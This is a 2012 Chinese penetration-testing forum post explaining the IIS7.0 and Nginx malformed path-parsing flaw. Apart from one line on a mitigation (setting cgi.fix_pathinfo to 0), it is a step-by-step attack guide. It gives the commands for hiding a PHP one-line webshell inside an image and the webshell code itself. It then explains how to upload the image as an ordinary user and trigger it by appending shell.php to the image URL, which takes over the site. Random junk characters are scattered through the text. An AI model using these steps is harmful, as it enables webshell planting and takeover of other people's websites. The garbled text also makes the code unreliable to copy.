中国网络渗透测试联盟

标题: IIS7.0解析漏洞利用 [打印本页]

作者: admin    时间: 2012-9-27 19:40
标题: IIS7.0解析漏洞利用
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0
/ n" b) d9 m8 @6 QNginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
. Z4 v! @& A" b  |$ g__________________________________ " B; k7 t: b6 T* w9 c) }7 E
1 Y! ^  }& L+ j2 O* T. ?7 ~. J* ]
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载) ' t+ w9 W/ x; ^/ M% @; Z4 @' a% F) T
先合并一张PHP一句话图片马,合并方法: 0 R5 I8 ]( v3 N1 L& Z
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif % z" D% U4 {3 s9 s
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" ' z1 X& R- M% o" l8 |
图片随便找一张.
% P2 R: x3 t9 b& x$ ]一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> 4 p8 u/ T2 W8 L% j3 T
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。 0 P. d3 [" g7 J/ i% |2 w
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 . O( }0 u" s; v# q6 `7 b6 \
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg- V# h" y: V0 v% E8 F; ~
则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
& w3 ^( b; A6 Z然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php
  e4 y! h( }/ u3 |: V6 ^shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
  y; Q, V/ J) L# |7 @上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 1 z& e8 q' H: f2 |
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 8 N+ r5 V1 {! p! C( x
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
6 B& r$ m1 S  N% Z( I( p5 I, f剩下的就随便你去搞吧。
3 m( ~1 I% z: ~- B. Z  u  R; q$ Z9 r8 {: q! ]2 J' f





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2